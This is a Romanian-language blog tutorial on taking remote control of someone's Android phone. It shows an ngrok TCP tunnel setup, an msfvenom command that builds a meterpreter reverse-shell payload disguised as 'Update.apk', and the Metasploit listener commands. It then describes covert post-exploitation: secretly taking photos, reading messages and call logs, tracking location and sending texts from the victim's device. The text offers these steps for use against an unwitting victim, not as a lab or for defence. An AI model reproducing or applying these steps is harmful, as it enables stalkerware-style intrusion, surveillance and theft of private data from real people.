Hacking Android Device [Remotely]

Hacking over WAN

Puteți verifica tutorialul meu video pe youtube aici:
https://youtu.be/Bbp-AcejtHI

De obicei, în WAN, în primul rând trebuie să aveți un IP/Hostname static și, în al doilea rând, trebuie să faceți Port Forwarding pentru a permite transmiterea traficului, și știm cu toții că ambele sunt atât de dificile în timp real, deoarece avem acces limitat la porturi într-o rețea.

Așa că, ceea ce vom face în acest scenariu, vom configura un tunel securizat folosind Ngrok.

Ngrok este un sistem proxy invers de tunelare care stabilește tuneluri de la un punct final public, adică un internet, la un serviciu de rețea care rulează la nivel local. Acest lucru ne poate ajuta să creăm un URL HTTP/HTTPS public pentru un site web care rulează local în mașina noastră. Nu trebuie să facem nici un fel de redirecționare a porturilor în timp ce folosim Ngrok, iar serviciul nostru de rețea se va expune în cele din urmă la internet cu ajutorul tunelului TCP.

Să urmați acești pași pentru a continua:

Pasul 1: Înregistrați-vă pentru contul Ngrok pentru a-l descărca.

În primul rând, va trebui să vă înregistrați pentru contul Ngrok, după care vă va invita la fereastra de descărcare.

Fereastra de înregistrare a Ngrok

După ce v-ați înregistrat, puteți descărca Ngrok pentru sistemul dumneavoastră Linux.

Dezarhivați pur și simplu fișierul descărcat.

Pasul 2: Conectați-vă contul

Executarea acestei comenzi va adăuga token-ul dvs. de autentificare la fișierul de configurare implicit ngrok.yml. Acest lucru vă va acorda acces la mai multe caracteristici și la timpi de sesiune mai lungi. (Trebuie să copiați și să lipiți aici propriul token furnizat în ecranul de pornire al ngrok după conectare)

./ngrok authtoken <your token>

Acum sunteți gata să utilizați acest instrument. Deschideți terminalul mutați-vă în directorul în care ați extras instrumentul Ngrock și tastați:

./ngrok tcp

alegeți un număr de port pe care doriți să legați o conexiune(aici, am ales 5555 ca număr de port). Și după ce apăsați pe enter, va apărea un ecran cam așa.

Direcționarea de aici specifică tunelul TCP pe care ngrok l-a creat. Conexiunea s-a legat la localhost la portul 5555. Acum trebuie să generăm o sarcină utilă malițioasă folosind msfvenom.

Pasul 3: Generarea sarcinii utile

Puteți face acest lucru deschizând un Terminal nou în mașina dumneavoastră Kali Linux și apoi tastând următorul cod.

msfvenom -p android/meterpreter/reverse_tcp LHOST=2.tcp.ngrok.io LPORT=15787 R> .apk

Dar țineți minte, de data aceasta este un pic diferit față de atacul pe care îl efectuam în LAN. Aici, în locul adresei IP, va trebui să introducem link-ul Forwarding furnizat în ngrok (2.tcp.ngrok.io). Iar numărul portului va fi 15787. Amintiți-vă că, este important să introduceți același număr de port furnizat de Ngrok în port forwarding.

Nota: Dacă introducerea adresei IP ca 2.tcp.ngrok.io nu funcționează, o puteți înlocui cu o adresă IP pe care o puteți obține folosind comanda „ping”.
Deschideți un terminal și tastați ping 2.tcp.ngrok.io și apăsați enter. Veți obține o adresă IP pe care trebuie să o puneți în locul lui LHOST.

Aici, am folosit „Update.apk” ca nume de fișier pentru sarcina noastră utilă. Acest fișier urmează să fie instalat în dispozitivul Android al țintei noastre. Dar, înainte de a instala acest fișier, trebuie să ne setăm ascultătorul. Pentru a face acest lucru, urmați pasul 4.

Pasul 4: Configurarea unui ascultător

Deschideți terminalul și încărcați consola Metasploit, tastând: msfconsole
După ce se încarcă (după câteva secunde), încărcați multi-handler exploit, tastând:

use exploit/multi/handler

Acum configurați o sarcină utilă inversă, tastând:

set payload android/meterpreter/reverse_tcp

Setați LHOST-ul dvs. ca fiind 0.0.0.0 și LPORT ca 5555
(Numărul portului trebuie să fie același cu numărul portului care a fost folosit pentru a lega conexiunea în ngrok)

set LHOST 0.0.0.0.0
set LPORT 5555

În final, tastați exploit pentru a porni ascultătorul.

Modul de ascultare este activat

Step5: Install the Malicious Update.apk file into the target’s device

Lasă victima să instaleze aplicația și să o ruleze imediat ce este instalată. Atunci când victima atinge opțiunea de deschidere a aplicației, veți avea acces la toate funcțiile dispozitivului android. Cu toate acestea, nimic nu va fi afișat pe ecranul dispozitivului după ce aplicația este deschisă.

Post-exploatare

Tăiați ajutor pentru a vedea diferitele opțiuni pe care le puteți folosi pentru a efectua diferite sarcini pe dispozitivul victimei.
Puteți accesa aparatul foto al acesteia și puteți face o fotografie fără să o notificați. Puteți să le verificați mesajele, jurnalele de apeluri și, de asemenea, să le salvați în sistem.
De asemenea, puteți vizualiza și deschide orice aplicație instalată pe dispozitivul lor. Puteți chiar să obțineți coordonatele actuale ale locației utilizatorului.
De asemenea, puteți trimite mesaje către orice număr de contact prin intermediul dispozitivului lor.

.

Lasă un răspuns

Adresa ta de email nu va fi publicată.